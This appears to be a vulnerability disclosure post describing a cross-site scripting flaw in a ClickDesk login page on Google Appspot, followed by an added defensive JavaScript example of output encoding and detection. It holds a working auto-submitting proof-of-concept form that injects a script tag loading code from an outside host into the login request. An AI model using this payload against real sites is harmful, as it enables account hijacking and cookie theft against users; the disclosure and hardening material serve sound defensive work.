
Cross Site Scripting Vulnerability at Google Appspot

The Google Appspot "ClickDesk" login page is vulnerable to a Cross Site Scripting (XSS) attack. Cross Site Scripting is a critical issue in web applications: when an attacker gets a user's browser to execute his or her XSS code, that code runs within the security context (or zone) of the hosting web site. With this level of privilege, the code can read (keylogging), modify and transmit any sensitive data accessible by the browser. A cross-site-scripted user could have his or her account hijacked (cookie theft), the browser redirected to another location, or be shown fraudulent content delivered by the web site being visited.

The vulnerability can easily be amplified with publicly available tools such as the Cross Site Scripting Framework (XSSF), XSS-Harvest (a Perl-based Cross Site Scripting harvesting tool) and so on.
Proof of concept:
The following proof-of-concept sample performs an HTTP POST that triggers the XSS vulnerability, using a script source taken from the "XSS cheatsheet from ha.ckers.org" site. In a real attack, the injection source URL would be hosted on a compromised web server.

Copy the following code and save it under any .htm or .html filename. Open it in any browser to trigger the request automatically.
*********

<script>
document.body.innerHTML += '<form id="a" action="https://contactuswidget.appspot.com/login.jsp?domain=lc" method="post">' +
  '<input type="hidden" name="command" value="login">' +
  '<input type="hidden" id="username" name="username" value="<script src=http:\/\/ha.ckers.org\/xss.jpg><\/script>">' +
  '<input type="hidden" id="password" name="password" value="aaaa">' +
  '</form>';
document.getElementById("a").submit();
</script>

*********
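The block below is an added, defensive illustration and is not code from the original post or from ClickDesk/Appspot: it models a login handler that echoes the submitted username back into the page without encoding (the reflection the PoC relies on), beside the same template with HTML entity encoding, plus a check a defender can run over rendered output or incoming form fields. The post does not state where login.jsp reflects the username, so the text-node error-message context, the function names and the sample input are assumptions.

```javascript
// Added example (not code from the original post or from ClickDesk/Appspot).
// Assumption: login.jsp echoes the "username" field into an error message
// as a text node; the post does not state the real reflection context.

// Encode the characters that carry meaning in HTML text and attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering: the untrusted field is concatenated straight into markup,
// so a value containing <script ...> becomes live markup in the response.
function renderLoginErrorVulnerable(username) {
  return '<p class="error">Login failed for ' + username + '</p>';
}

// Hardened rendering: same template, but the untrusted value is entity-encoded
// for its HTML context before concatenation.
function renderLoginErrorSafe(username) {
  return '<p class="error">Login failed for ' + escapeHtml(username) + '</p>';
}

// Count live <script> start tags in rendered HTML; a login error page should have none.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Request-side detection: flag a form field that carries something tag-like,
// useful for logging or alerting in front of a login handler.
function fieldLooksLikeMarkup(value) {
  return /<\s*\/?[a-z][\s\S]*>/i.test(String(value));
}

// Constructed input mirroring the PoC payload above; the URL is only a string here.
const POC_USERNAME = '<script src=http://ha.ckers.org/xss.jpg></script>';

// Run both renderings over the constructed input and report what each produces.
function demo() {
  return {
    vulnerableScriptTags: countScriptTags(renderLoginErrorVulnerable(POC_USERNAME)), // 1
    safeScriptTags: countScriptTags(renderLoginErrorSafe(POC_USERNAME)),             // 0
    flagged: fieldLooksLikeMarkup(POC_USERNAME),                                      // true
    safeHtml: renderLoginErrorSafe(POC_USERNAME),
  };
}
```

The same encoding step must be applied wherever the field is re-emitted (error text, a repopulated value="..." attribute), since each context needs its own encoding.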
Submitted by "Andrew Chong", codename "Andrew Chong"